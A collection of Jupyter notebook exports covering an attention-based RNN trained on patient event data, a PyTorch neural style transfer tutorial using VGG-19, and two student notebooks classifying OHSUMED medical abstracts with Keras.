# Define the linear layers using `nn.Linear()`
self.fc = nn.Linear(num_codes, 1)
# Define the final activation layer using `nn.Sigmoid().
self.sigmoid = nn.Sigmoid()
def forward(self, events, masks):
# Pass the events data through RNN-alpha
g, _ = self.rnn_a(events)
# Pass the events data through RNN-beta
h, _ = self.rnn_b(events)
# Obtain the alpha and beta attentions using `AlphaAttention()` and `BetaAttention()`;
alpha = self.att_a(g)
beta = self.att_b(h)
# Perform the weighted sum of the events data using the attention weights for the dates with events data
c = self.attention_sum(alpha, beta, events, masks)
# Pass the context vector through the linear and activation layers.
logits = self.fc(c)
probs = self.sigmoid(logits)
return probs.squeeze()
###Output
_____no_output_____
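###Markdown
A minimal shape check of the full model (illustrative only: the vocabulary size, batch size and sequence length are invented, and the per-date mask is assumed to be 2-D, which is what the unsqueeze(-1) in attention_sum implies):
###Code
import torch

num_codes_demo = 50                                # hypothetical number of event codes
demo_events = torch.rand(4, 7, num_codes_demo)     # (batch, # of dates, # of event codes)
demo_masks = torch.ones(4, 7)                      # 1 = the date contains events data
demo_model = EventsRNN(num_codes_demo, emb_size=128)
demo_probs = demo_model(demo_events, demo_masks)
print(demo_probs.shape)                            # torch.Size([4]): one probability per patient
###Output
_____no_output_____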
###Markdown
Model training and evaluation Functions
###Code
def train(model, train_loader, n_epochs):
model.train() # prep model for training
for epoch in range(n_epochs):
curr_epoch_loss = []
print('Batch :', end = ' ')
for step, batch in enumerate(train_loader):
if step % 10 == 0 and step>0:
print(str(step)+',', end=' ' )
x, masks, events, events_masks, labels = batch
""" Step 1. clear gradients """
optimizer.zero_grad()
""" Step 2. evaluate model ouput """
probs = model(events, events_masks)
""" Step 3. Calculate loss """
loss = criterion(probs, labels)
""" Step 4. Backward propagation """
loss.backward()
""" Step 5. optimization """
optimizer.step()
""" Step 6. record loss """
curr_epoch_loss.append(loss.cpu().data.numpy())
print(f"Epoch {epoch}: curr_epoch_loss={np.mean(curr_epoch_loss)}")
return model
def eval_model(model, val_loader):
model.eval()
val_labels = []
val_probs = []
for step, batch in enumerate(val_loader):
x, masks, events, events_masks, labels = batch
with torch.no_grad():
probs = model(events, events_masks)
val_labels.extend(labels.detach().cpu().numpy().tolist())
val_probs.extend(probs.detach().cpu().numpy().reshape(-1).tolist())
precision, recall, f1, _ = precision_recall_fscore_support(val_labels, np.array(val_probs)>0.5, average='binary')
roc_auc = roc_auc_score(val_labels, val_probs)
return precision, recall, f1, roc_auc
def train_and_eval(model, train_loader, val_loader, n_epochs=10, filename='model.pt'):
t0 = time.time()
train(model, train_loader, n_epochs)
t1 = time.time()
processing_time = t1-t0
print('Model Training time: ' + str(processing_time))
p, r, f, roc_auc = eval_model(model, val_loader)
print ("Learning rate: " + str(learning_rate))
print("Model Training time: " + str(processing_time))
print("Precision = ",p)
print("Recall = ", r)
print("F1 = ", f)
print("ROC AUC = ", roc_auc)
print(p,"\t",r,"\t",f,"\t",roc_auc)
"""
if filename is not None:
torch.save(model.state_dict(), filename)
"""
return p, r, f, roc_auc
###Output
_____no_output_____
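###Markdown
The training cells below reference a load_and_eval helper that is not defined in this notebook excerpt (the torch.save call in train_and_eval is also commented out). A minimal sketch of such a helper, assuming it simply restores a saved state dict and reuses eval_model, could look like this:
###Code
import torch

# Hypothetical helper, not part of the original notebook.
def load_and_eval(model, filename, val_loader):
    state_dict = torch.load(filename, map_location='cpu')  # assumes weights were saved via torch.save(model.state_dict(), filename)
    model.load_state_dict(state_dict)
    p, r, f, roc_auc = eval_model(model, val_loader)
    print("Precision =", p)
    print("Recall =", r)
    print("F1 =", f)
    print("ROC AUC =", roc_auc)
    return p, r, f, roc_auc
###Output
_____no_output_____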
###Markdown
Model Creation and Optimizer definition
###Code
def create_model_and_optimizer():
model = EventsRNN(max_code, emb_size=128)
if torch.cuda.device_count() >0:
model.cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
#optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, momentum = 0.9, nesterov = True)
return model, optimizer
###Output
_____no_output_____
###Markdown
Model Training and Evaluation
###Code
learning_rate = 0.001
n_epochs = 10
criterion = nn.BCELoss()
print('Learning Rate: ' + str(learning_rate))
print ("Number of Epochs: " + str(n_epochs))
print ('')
print ('--------------')
print ('Original model')
print ('--------------')
model, optimizer = create_model_and_optimizer()
train_loader, val_loader = get_unbalanced_dataloaders() # You can pass a number to limit the number of samples
train_and_eval(model, train_loader, val_loader, n_epochs, 'unbalanced_model.pt')
#load_and_eval(model, 'unbalanced_model.pt', val_loader)
learning_rate = 0.0001
n_epochs = 10
criterion = nn.BCELoss()
print('Learning Rate: ' + str(learning_rate))
print ("Number of Epochs: " + str(n_epochs))
print ('')
print ('')
print ('--------------')
print ('Balanced model')
print ('--------------')
model, optimizer = create_model_and_optimizer()
train_loader, val_loader = get_balanced_dataloaders() # You can pass a number to limit the number of samples
train_and_eval(model, train_loader, val_loader, n_epochs, 'balanced_model.pt')
#load_and_eval(model, 'balanced_model.pt', val_loader)
###Output
Learning Rate: 0.0001
Number of Epochs: 10
--------------
Balanced model
--------------
* Train dataset *
Number of Patients: 13790
* Test dataset *
Number of Patients: 1965
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 0: curr_epoch_loss=0.6428784728050232
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 1: curr_epoch_loss=0.46494531631469727
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 2: curr_epoch_loss=0.3550058901309967
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 3: curr_epoch_loss=0.28842878341674805
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 4: curr_epoch_loss=0.23932117223739624
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 5: curr_epoch_loss=0.20136545598506927
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 6: curr_epoch_loss=0.17096295952796936
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 7: curr_epoch_loss=0.1442098617553711
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 8: curr_epoch_loss=0.12268555909395218
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 9: curr_epoch_loss=0.10383887588977814
Model Training time: 644.5986795425415
Learning rate: 0.0001
Model Training time: 644.5986795425415
Precision = 0.7318840579710145
Recall = 0.8632478632478633
F1 = 0.792156862745098
ROC AUC = 0.9600473023349972
0.7318840579710145 0.8632478632478633 0.792156862745098 0.9600473023349972
|
notebooks/1_style_transfer_colab.ipynb | ###Markdown
Loading in Images
###Code
# Use GPU if available
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Assign desired size of the output image
imsize = 512 if torch.cuda.is_available() else 128
# Create image composer
loader = Compose([
Resize(imsize), # scale imported image
ToTensor() # transform it into a torch tensor
])
# Helper for converting images to tensors
def image_loader(image_name):
image = Image.open(image_name)
# fake batch dimension required to fit network's input dimensions
image = loader(image).unsqueeze(0)
return image.to(device, torch.float)
# Load in images as tensors
style_img = image_loader(requests.get("https://github.com/dkharazi/style-transfer/blob/main/data/style/picasso.jpg?raw=true", stream=True).raw)
content_img = image_loader(requests.get("https://github.com/dkharazi/style-transfer/blob/main/data/content/dancing.jpg?raw=true", stream=True).raw)
# Glimpse of the tensor!
style_img[0][0]
###Output
_____no_output_____
###Markdown
Exploratory Image Plotting
###Code
# Reconvert into PIL image
unloader = ToPILImage()
# Initialize plot in interactive mode
plt.ion()
# Helper for displaying pytorch tensors
def imshow(tensor, title=None):
image = tensor.cpu().clone() # clone the tensor so we don't modify the original
image = image.squeeze(0) # remove the fake batch dimension
image = unloader(image)
plt.imshow(image)
if title is not None:
plt.title(title)
plt.pause(0.001) # pause a bit so that plots are updated
# Plot style image
plt.figure()
imshow(style_img, title='Style Image')
# Plot content image
plt.figure()
imshow(content_img, title='Content Image')
###Output
_____no_output_____
###Markdown
Defining the Loss Functions
###Code
# Define the content loss function
class ContentLoss(Module):
def __init__(self, target,):
super(ContentLoss, self).__init__()
# we 'detach' the target content from the tree used
# to dynamically compute the gradient: this is a stated value,
# not a variable. Otherwise the forward method of the criterion
# will throw an error.
self.target = target.detach()
def forward(self, input):
self.loss = mse_loss(input, self.target)
return input
# Initialize gram matrix function used in style loss function
def gram_matrix(input):
# a is batch size (=1)
# b is number of feature maps
# (c,d) are dimensions of a feature map (N=c*d)
a, b, c, d = input.size()
# reshape F_XL into \hat F_XL
features = input.view(a * b, c * d)
# compute the gram product
G = torch.mm(features, features.t())
# we 'normalize' the values of the gram matrix
# by dividing by the number of elements in each feature map.
return G.div(a * b * c * d)
# Define the style loss function
class StyleLoss(Module):
def __init__(self, target_feature):
super(StyleLoss, self).__init__()
self.target = gram_matrix(target_feature).detach()
def forward(self, input):
G = gram_matrix(input)
self.loss = mse_loss(G, self.target)
return input
###Output
_____no_output_____
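###Markdown
To make the normalization in gram_matrix concrete, here is a small illustrative check on a random feature map (the tensor size is made up; this cell is not part of the original notebook): for a 1 x C x H x W activation the result is a C x C matrix of channel correlations divided by C*H*W.
###Code
import torch

dummy_feat = torch.rand(1, 64, 32, 32)   # pretend VGG feature map: batch=1, 64 channels, 32x32
G_demo = gram_matrix(dummy_feat)
print(G_demo.shape)                      # torch.Size([64, 64])
print(G_demo.max().item())               # entries are small thanks to the division by a*b*c*d
###Output
_____no_output_____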
###Markdown
Loading in the Pretrained VGG-19 Model
###Code
# Load in vgg-19
cnn = vgg19(pretrained=True).features.to(device).eval()
# Initialize normalized channel means and standard deviations
# used in training for the VGG-19 network
cnn_normalization_mean = torch.tensor([0.485, 0.456, 0.406]).to(device)
cnn_normalization_std = torch.tensor([0.229, 0.224, 0.225]).to(device)
# Create a module to normalize input image
# so we can easily put it in a nn.Sequential
class Normalization(Module):
def __init__(self, mean, std):
super(Normalization, self).__init__()
# .view the mean and std to make them [C x 1 x 1] so that they can
# directly work with image Tensor of shape [B x C x H x W].
# B is batch size. C is number of channels. H is height and W is width.
self.mean = mean.clone().detach().view(-1, 1, 1)
self.std = std.clone().detach().view(-1, 1, 1)
def forward(self, img):
# normalize img
return (img - self.mean) / self.std
###Output
_____no_output_____
###Markdown
Computing Content and Style Losses
###Code
# Desired depth layers to compute style/content losses
content_layers_default = ['conv_4']
style_layers_default = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']
# Helper for computing content and style losses
def get_style_model_and_losses(cnn, normalization_mean, normalization_std,
style_img, content_img,
content_layers=content_layers_default,
style_layers=style_layers_default):
cnn = copy.deepcopy(cnn)
# normalization module
normalization = Normalization(normalization_mean, normalization_std).to(device)
# just in order to have iterable access to the lists of content/style
# losses
content_losses = []
style_losses = []
# assuming that cnn is a nn.Sequential, so we make a new nn.Sequential
# to put in modules that are supposed to be activated sequentially
model = Sequential(normalization)
i = 0 # increment every time we see a conv
for layer in cnn.children():
if isinstance(layer, Conv2d):
i += 1
name = 'conv_{}'.format(i)
elif isinstance(layer, ReLU):
name = 'relu_{}'.format(i)
# The in-place version doesn't play very nicely with the ContentLoss
# and StyleLoss we insert below. So we replace with out-of-place
# ones here.
layer = ReLU(inplace=False)
elif isinstance(layer, MaxPool2d):
name = 'pool_{}'.format(i)
elif isinstance(layer, BatchNorm2d):
name = 'bn_{}'.format(i)
else:
raise RuntimeError('Unrecognized layer: {}'.format(layer.__class__.__name__))
model.add_module(name, layer)
if name in content_layers:
# add content loss:
target = model(content_img).detach()
content_loss = ContentLoss(target)
model.add_module("content_loss_{}".format(i), content_loss)
content_losses.append(content_loss)
if name in style_layers:
# add style loss:
target_feature = model(style_img).detach()
style_loss = StyleLoss(target_feature)
model.add_module("style_loss_{}".format(i), style_loss)
style_losses.append(style_loss)
# now we trim off the layers after the last content and style losses
for i in range(len(model) - 1, -1, -1):
if isinstance(model[i], ContentLoss) or isinstance(model[i], StyleLoss):
break
model = model[:(i + 1)]
return model, style_losses, content_losses
###Output
_____no_output_____
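###Markdown
An optional, illustrative inspection (not in the original notebook): building the loss-augmented network once and printing it shows where the ContentLoss and StyleLoss modules were inserted, and confirms that the layers after the last loss module were trimmed away.
###Code
tmp_model, tmp_style_losses, tmp_content_losses = get_style_model_and_losses(
    cnn, cnn_normalization_mean, cnn_normalization_std, style_img, content_img)
print(tmp_model)                                   # truncated VGG with loss modules interleaved
print(len(tmp_style_losses), 'style losses and',
      len(tmp_content_losses), 'content loss(es) collected')
###Output
_____no_output_____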
###Markdown
Performing Backward Propagation
###Code
# Copy content image
input_img = content_img.clone()
# Helper for initializing the L-BFGS optimizer
def get_input_optimizer(input_img):
# this line to show that input is a parameter that requires a gradient
optimizer = LBFGS([input_img.requires_grad_()])
return optimizer
# Perform backward propagation using test content and style images
def run_style_transfer(cnn, normalization_mean, normalization_std,
content_img, style_img, input_img, num_steps=300,
style_weight=1000000, content_weight=1):
"""Run the style transfer."""
print('Building the style transfer model..')
model, style_losses, content_losses = get_style_model_and_losses(cnn,
normalization_mean, normalization_std, style_img, content_img)
optimizer = get_input_optimizer(input_img)
print('Optimizing..')
run = [0]
while run[0] <= num_steps:
def closure():
# correct the values of updated input image
input_img.data.clamp_(0, 1)
optimizer.zero_grad()
model(input_img)
style_score = 0
content_score = 0
for sl in style_losses:
style_score += sl.loss
for cl in content_losses:
content_score += cl.loss
style_score *= style_weight
content_score *= content_weight
loss = style_score + content_score
loss.backward()
run[0] += 1
if run[0] % 50 == 0:
print("run {}:".format(run))
print('Style Loss : {:4f} Content Loss: {:4f}'.format(
style_score.item(), content_score.item()))
print()
return style_score + content_score
optimizer.step(closure)
# a last correction...
input_img.data.clamp_(0, 1)
return input_img
###Output
_____no_output_____
###Markdown
Testing Content and Style Images
###Code
# Generate stylized content image
output = run_style_transfer(
cnn,
cnn_normalization_mean,
cnn_normalization_std,
content_img,
style_img,
input_img
)
# Show generated image
plt.figure()
imshow(output, title='Output Image')
plt.ioff()
plt.show()
# Save generated image
save_image(output, "genimage.png")
###Output
_____no_output_____ |
Case 3. Medical text categorization.ipynb | ###Markdown
Case 3. Medical text categorization. Cognitive Systems for Health Technology Applications. Viljami Koho, 10.3.2018. [Helsinki Metropolia University of Applied Sciences](http://www.metropolia.fi/en) 1. Objectives The aim of this assignment is to learn to use recurrent and 1D convolutional neural networks to categorize medical texts. 2. Processing raw data Based on listing 6.8 (p. 189), Chollet: Deep Learning with Python, 2018.
###Code
import os
import time
ohsumed_dir = 'ohsumed-first-20000-docs/'
train_dir = os.path.join(ohsumed_dir, 'training')
# Creates two lists
labels = []
texts = []
# Generate a list L = ['C01', 'C02, ..., 'C023']
L = ['C{:02}'.format(n) for n in range(1, 23 + 1)]
for label_type in L:
dir_name = os.path.join(train_dir, label_type)
for fname in os.listdir(dir_name):
f = open(os.path.join(dir_name, fname))
texts.append(f.read())
f.close()
i = L.index(label_type)
labels.append(i)
###Output
_____no_output_____
###Markdown
3. Tokenize the text of the raw data. Based on listing 6.9 (p. 189). - Preprocess the word data into integer tensors - Each sample is zero-padded to length "maxlen" - Only the "max_words" most frequent words are taken into account
###Code
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
import numpy as np
#Cuts off reviews after 300 words
maxlen = 300
#Considers only the top 20000 words in the dataset
max_words = 20000
tokenizer = Tokenizer(num_words = max_words)
# Forms the words to integer lists
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
print('Found %s unique tokens' % len(word_index))
###Output
Using TensorFlow backend.
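###Markdown
To make the tokenization step concrete, here is a small self-contained toy example (illustrative only, separate from the abstracts above) showing what texts_to_sequences and pad_sequences produce:
###Code
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences

toy_texts = ['chest pain and shortness of breath',
             'no chest pain reported',
             'breath sounds normal']
toy_tokenizer = Tokenizer(num_words=10)            # keep only the most frequent words
toy_tokenizer.fit_on_texts(toy_texts)
toy_sequences = toy_tokenizer.texts_to_sequences(toy_texts)
print(toy_tokenizer.word_index)                    # word -> integer index, most frequent words first
print(toy_sequences)                               # each text becomes a list of integer indices
print(pad_sequences(toy_sequences, maxlen=5))      # zero-padded (and truncated) from the left by default
###Output
_____no_output_____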
###Markdown
4. Shape the data and labels
###Code
from keras.utils.np_utils import to_categorical
data = pad_sequences(sequences, maxlen = maxlen)
labels = np.asarray(labels)
one_hot_labels = to_categorical(labels)
print('Shape of data tensor:', data.shape)
print('Shape of labels tensor:', one_hot_labels.shape)
###Output
Shape of data tensor: (10433, 300)
Shape of labels tensor: (10433, 23)
###Markdown
Shuffle the data and labels - Shuffle the training data - Split the data into a training set and a validation set, but shuffle the data first - Shuffling is important when the data samples are ordered, for example all negative first, then all positive
###Code
indices = np.arange(data.shape[0])
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
one_hot_labels = one_hot_labels[indices]
###Output
_____no_output_____
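###Markdown
A small illustrative check of why the shuffle matters (not in the original notebook): the abstracts were loaded category by category, so without shuffling the last 20% of the rows, which validation_split uses for validation, would contain only the last categories. After shuffling, that slice covers essentially all 23 classes.
###Code
n_val = int(0.2 * len(labels))     # size of the slice used by validation_split = 0.2
print('Distinct classes in the last 20% after shuffling:', np.unique(labels[-n_val:]))
###Output
_____no_output_____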
###Markdown
5. Build the model Based on listing 6.7 (p. 187)
###Code
# Build and compile the network model
from keras.models import Sequential
from keras.layers import Flatten, Dense, Embedding, Dropout, LSTM
model = Sequential()
model.add(Embedding(max_words, 32, input_shape=(maxlen,)))
model.add(LSTM(100, dropout=0.2))
model.add(Dense(23, activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = ['accuracy'])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_1 (Embedding) (None, 300, 32) 640000
_________________________________________________________________
lstm_1 (LSTM) (None, 100) 53200
_________________________________________________________________
dense_1 (Dense) (None, 23) 2323
=================================================================
Total params: 695,523
Trainable params: 695,523
Non-trainable params: 0
_________________________________________________________________
###Markdown
6. Train the model
###Code
import time
t1 = time.time()
# Fit the model to training data
history = model.fit(data, one_hot_labels,
epochs = 20,
batch_size = 32,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
###Output
Train on 8346 samples, validate on 2087 samples
Epoch 1/20
8346/8346 [==============================] - 81s 10ms/step - loss: 2.8183 - acc: 0.1695 - val_loss: 2.8146 - val_acc: 0.1634
Epoch 2/20
8346/8346 [==============================] - 80s 10ms/step - loss: 2.7158 - acc: 0.1885 - val_loss: 2.6743 - val_acc: 0.2089
Epoch 3/20
8346/8346 [==============================] - 78s 9ms/step - loss: 2.5646 - acc: 0.2351 - val_loss: 2.6487 - val_acc: 0.2262
Epoch 4/20
8346/8346 [==============================] - 77s 9ms/step - loss: 2.4380 - acc: 0.2731 - val_loss: 2.6455 - val_acc: 0.2103
Epoch 5/20
8346/8346 [==============================] - 78s 9ms/step - loss: 2.3384 - acc: 0.2922 - val_loss: 2.6132 - val_acc: 0.2295
Epoch 6/20
8346/8346 [==============================] - 78s 9ms/step - loss: 2.2272 - acc: 0.3217 - val_loss: 2.6132 - val_acc: 0.2171
Epoch 7/20
8346/8346 [==============================] - 78s 9ms/step - loss: 2.1232 - acc: 0.3466 - val_loss: 2.6154 - val_acc: 0.2314
Epoch 8/20
8346/8346 [==============================] - 78s 9ms/step - loss: 2.0232 - acc: 0.3802 - val_loss: 2.7473 - val_acc: 0.2238
Epoch 9/20
8346/8346 [==============================] - 78s 9ms/step - loss: 1.9434 - acc: 0.3991 - val_loss: 2.7813 - val_acc: 0.1969
Epoch 10/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.8530 - acc: 0.4329 - val_loss: 2.7615 - val_acc: 0.2223
Epoch 11/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.7759 - acc: 0.4499 - val_loss: 2.7539 - val_acc: 0.2161
Epoch 12/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.7133 - acc: 0.4612 - val_loss: 2.8359 - val_acc: 0.2012
Epoch 13/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.6416 - acc: 0.4883 - val_loss: 2.8841 - val_acc: 0.2041
Epoch 14/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.5847 - acc: 0.4935 - val_loss: 2.9283 - val_acc: 0.2084
Epoch 15/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.5405 - acc: 0.5150 - val_loss: 2.9914 - val_acc: 0.1989
Epoch 16/20
8346/8346 [==============================] - 78s 9ms/step - loss: 1.4959 - acc: 0.5208 - val_loss: 3.0528 - val_acc: 0.1974
Epoch 17/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.4438 - acc: 0.5266 - val_loss: 3.0787 - val_acc: 0.1955
Epoch 18/20
8346/8346 [==============================] - 78s 9ms/step - loss: 1.4076 - acc: 0.5409 - val_loss: 3.1773 - val_acc: 0.1931
Epoch 19/20
8346/8346 [==============================] - 78s 9ms/step - loss: 1.3692 - acc: 0.5462 - val_loss: 3.2882 - val_acc: 0.1720
Epoch 20/20
8346/8346 [==============================] - 81s 10ms/step - loss: 1.3318 - acc: 0.5518 - val_loss: 3.2833 - val_acc: 0.1682
Elapsed time: 1561.79 seconds
###Markdown
7. Training results
###Code
# Plot the results
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
plt.figure(figsize=(15, 3))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.figure(figsize=(15, 3))
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
- My first test: epochs = 10, batch_size = 32, validation_split = 0.2, with model.add(Embedding(max_words, 32, input_length=maxlen)) followed by model.add(Flatten()). At first I got the training accuracy near ~57%, but I wasn't happy with the validation accuracy, because it was only 0.08 = ~8%, which is bad. After that I tried other parameters to get better results, but it didn't help noticeably. - Second test: epochs = 20, batch_size = 64, validation_split = 0.2, with the same Embedding and Flatten layers. The training accuracy was almost the same (~60%) and the validation accuracy was a little higher than in test 1 (0.125 = 12.5%). Still I wasn't happy with the validation accuracy; I needed to get it higher. - After the second test I added a dropout layer, model.add(Dropout(0.3)), to see what happens. The result was still poor. Then I added another dropout layer, because I still suspected the network was overfitting and that is why the validation accuracy kept decreasing: model.add(Dense(1024, activation = 'relu')), model.add(Dropout(0.3)), model.add(Dense(256, activation = 'relu')), model.add(Dropout(0.2)), model.add(Dense(len(L), activation = 'softmax')), trained with history = model.fit(data, one_hot_labels, epochs = 20, batch_size = 32, validation_split = 0.2). No effect: the validation accuracy was still bad and not even close to the training accuracy. - I then changed maxlen and max_words: maxlen (reviews are cut off after this many words) from 250 to 300, and max_words (only the top max_words words in the dataset are considered) from 10000 to 20000. No significant change in the outcome. - In my final test I used an LSTM layer, and it seemed to work better than the version with Dense layers only. Now I get better results than earlier: training accuracy ~56% and validation accuracy ~18%. There still seems to be some overfitting, since the validation accuracy decreases slowly. I searched for the problem and found that "in general a model that overfits can be improved by adding more dropout, or training and validating on a larger data set", so I tried to add more dropout again. Metrics results
###Code
# Calculate the predictions
predictions = model.predict(data)
y_pred = np.argmax(predictions, axis = 1)
predictions[0]
# http://scikit-learn.org/stable/modules/model_evaluation.html
from sklearn.metrics import accuracy_score, precision_score, f1_score, confusion_matrix
from sklearn.metrics import classification_report, recall_score
# Classification results per class
print(classification_report(labels, y_pred))
# Confusion matrix
cm = confusion_matrix(labels, y_pred)
print(np.array2string(cm, max_line_width = 100))
print(texts[indices[512]])
print('True class: ', labels[512])
print('Predicted class:', y_pred[512])
print('Predictions per class:')
print(np.array2string(predictions[512], precision = 2))
plt.stem(predictions[512])
plt.show()
np.__version__
#Download and preprocess test data
test_dir = os.path.join(ohsumed_dir, 'test')
test_labels = []
test_texts = []
for label_type in L:
dir_name = os.path.join(test_dir, label_type)
for fname in os.listdir(dir_name):
f = open(os.path.join(dir_name, fname))
test_texts.append(f.read())
f.close()
test_labels.append(L.index(label_type))
test_sequences = tokenizer.texts_to_sequences(test_texts)
x_test = pad_sequences(test_sequences, maxlen=maxlen)
test_labels = np.asarray(test_labels)
y_test = to_categorical(test_labels)
#Evaluate model with test data
model.evaluate(x_test, y_test)
###Output
12733/12733 [==============================] - 28s 2ms/step
###Markdown
Case 3. Medical text categorization. Thi, Le Thanh - 1504521. Cognitive Systems for Health Technology Applications. Helsinki Metropolia University of Applied Sciences. Task: To use recurrent and convolutional neural networks to create a classifier for a collection of medical abstracts extracted from MEDLINE. Download and Preprocessing Data: http://disi.unitn.it/moschitti/corpora.htm. Download the data from that link: cardiovascular diseases abstracts, file name 'ohsumed-first-20000-docs.tar.gz'.
###Code
from urllib.request import urlretrieve
url = r"http://disi.unitn.it/moschitti/corpora/ohsumed-first-20000-docs.tar.gz"
dst = 'ohsumed-first-20000-docs.tar.gz'
urlretrieve(url, dst)
# Extract the tarfile. Creates a folder: ohsu-trec
import tarfile
tar = tarfile.open("ohsumed-first-20000-docs.tar.gz")
tar.extractall()
tar.close()
###Output
_____no_output_____
###Markdown
Collect the individual training abstracts into a list of strings, one string per document, and also collect the corresponding labels into a labels list. There are 23 categories.
###Code
import os
ohsumed_dir = r'C:\Users\Thi\Desktop\ohsumed-first-20000-docs'
train_dir = os.path.join(ohsumed_dir, 'training')
labels = []
texts = []
# Generate a list L = ['C01', 'C02, ..., 'C023']
L = ['C{:02}'.format(n) for n in range(1, 23 + 1)]
for label_type in L:
dir_name = os.path.join(train_dir, label_type)
for fname in os.listdir(dir_name):
f = open(os.path.join(dir_name, fname))
texts.append(f.read())
f.close()
i = L.index(label_type)
labels.append(i)
###Output
_____no_output_____
###Markdown
Tokenize the text of the raw data. Vectorize the texts that have been collected. We cut off each text after 500 words and only consider the top 20,000 words in the dataset.
###Code
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
import numpy as np
maxlen = 500
max_words = 20000
tokenizer = Tokenizer(num_words = max_words)
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
print('Found %s unique tokens' % len(word_index))
#Shape the data and labels
from keras.utils.np_utils import to_categorical
data = pad_sequences(sequences, maxlen = maxlen)
labels = np.asarray(labels)
one_hot_labels = to_categorical(labels)
print('Shape of data tensor:', data.shape)
print('Shape of labels tensor:', one_hot_labels.shape)
#Shuffle the data and labels
indices = np.arange(data.shape[0])
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
one_hot_labels = one_hot_labels[indices]
###Output
_____no_output_____
###Markdown
Build the model. Make a simple network with an arbitrary choice of layers and numbers of neurons.
###Code
from keras.models import Sequential
from keras.layers import Flatten, Dense, Embedding
model = Sequential()
model.add(Embedding(max_words, 8, input_length=maxlen))
model.add(Flatten())
model.add(Dense(1024, activation = 'relu'))
model.add(Dense(256, activation = 'relu'))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = ['accuracy'])
model.summary()
# Train the model
import time
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 10,
batch_size = 32,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
# Training results
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
plt.figure(figsize=(15, 3))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.figure(figsize=(15, 3))
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
Metrics results. Looking at the results above, the highest accuracy we get is 25%, at the second epoch. For classification, however, accuracy alone is a poor measure of the model.
###Code
# Calculate the predictions
predictions = model.predict(data)
y_pred = np.argmax(predictions, axis = 1)
# http://scikit-learn.org/stable/modules/model_evaluation.html
from sklearn.metrics import accuracy_score, precision_score, f1_score, confusion_matrix
from sklearn.metrics import classification_report, recall_score
# Confusion matrix
